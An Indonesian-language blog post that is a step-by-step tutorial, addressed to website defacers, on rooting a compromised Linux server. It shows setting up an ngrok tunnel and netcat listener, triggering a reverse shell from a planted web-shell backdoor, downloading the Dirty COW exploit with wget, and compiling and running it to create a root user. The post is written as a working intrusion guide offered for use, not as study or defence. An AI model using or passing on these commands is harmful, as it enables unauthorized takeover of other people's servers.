Cara Rooting Server Menggunakan Dirtycow (Ngrok + Netcat)


Hallo, 
Kembali lagi di Evil Twin - Blog, Oke pada artikel kali ini Saya ingin memberikan Tutorial Rooting Server Menggunakan Dirtycow (Ngrok + Netcat)

Tutorial ini mungkin berguna untuk Defacer yang ingin rooting server tapi tidak mengetahui bagaimana caranya, Nah disini akan Saya tulis dari awal sampai akhir dan tentunya dilengkapi dengan gambar agar lebih mudah dipahami.

Oke langsung aja ke tutorialnya.

Kernel Harus 2016 Kebawah

Yang harus diperhatikan dalam tutorial rooting server ini adalah kernelnya harus tahun 2016 kebawah, Untuk tahun 2016 keatas Saya kurang tau bisa atau enggak.

Cara mengecek kernelnya menggunakan bisa menggunakan command:
uname -a

Outputnya adalah Linux xxxxxxx 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

Download dan Auth Ngrok

Jangan lupa untuk buat akun ngrok di sini guna mengautentikasi token. Ekstrak ngrok-XXX.zip nya lalu autentikasi token nya agar ngrok dapat berjalan. Ganti tokennya sesuai dengan akun Kalian masing-masing.
ngrok.exe authtoken TOKENMU

Jika berhasil maka outputnya akan seperti gambar diatas.

Download Netcat dan Konfigurasi Ngrok

Untuk netcatnya bisa di download melalui link: https://eternallybored.org/misc/netcat/

Selanjutnya run/jalankan ngrok dengan tcp, Untuk portnya sesuai selera (disini selera Saya ada di port 1337) wkwk.


Lalu Jalankan netcat, pastikan port sesuai dengan port yang di jalankan di ngrok.


Jika outputnya seperti gambar diatas, Artinya netcat berhasil dijalankan. Tinggal backconnect aja deh.

Backconnect Server

Setelah semua terkonfigurasi, tinggal melakukan backconnect server ke komputer Kalian, pastikan Shell Backdoor yang Kalian gunakan mempunyai fitur backconnect (disini Saya menggunakan Evil Twin - Shell)

Masukkan server dan portnya sesuai dengan yang ada di ngrok, Seperti ini:


Perhatikan gambar diatas, Disitu saya memasukkan server dan portnya sesuai dengan yang ada di ngrok.


Jika outputnya seperti gambar diatas selanjutnya tinggal cek netcat yang tadi sedang listening di port 1337, Harusnya sih akan seperti ini:


Selanjutnya tinggal Spawn Shell (python), download Dirty COW (disini Saya menggunakan wget) dan lain-lain.

Untuk command lengkapnya adalah sebagai berikut:
python -c 'import pty; pty.spawn("/bin/sh")'
wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
chmod +x dirty
./dirty

Nantinya akan dimintai membuat Password (disini Saya membuat password "eviltwin")


Tunggu hingga prosesnya selesai dan untuk mengeceknya apakah sudah root atau belum, Tinggal memasukkan command dibawah ini:
python -c 'import pty; pty.spawn("/bin/sh")'
ssh firefart@localhost
Lalu masukkan password yang tadi dibuat dan untuk mengecek apakah sudah root atau belum masukkan command dibawah ini:
id firefart
Jika outputnya seperti ini uid=0(firefart) gid=0(root) groups=0(root) artinya berhasil.

Akhir Kata

Oke mungkin cukup sampai disini aja artikel tentang "Cara Rooting Server Menggunakan Dirtycow (Ngrok + Netcat)".
Mohon maaf bila ada kesalahan kata dan sebagainya, Mohon dimaklumi.

Semoga bermanfaat dan Sampai jumpa di artikel selanjutnya!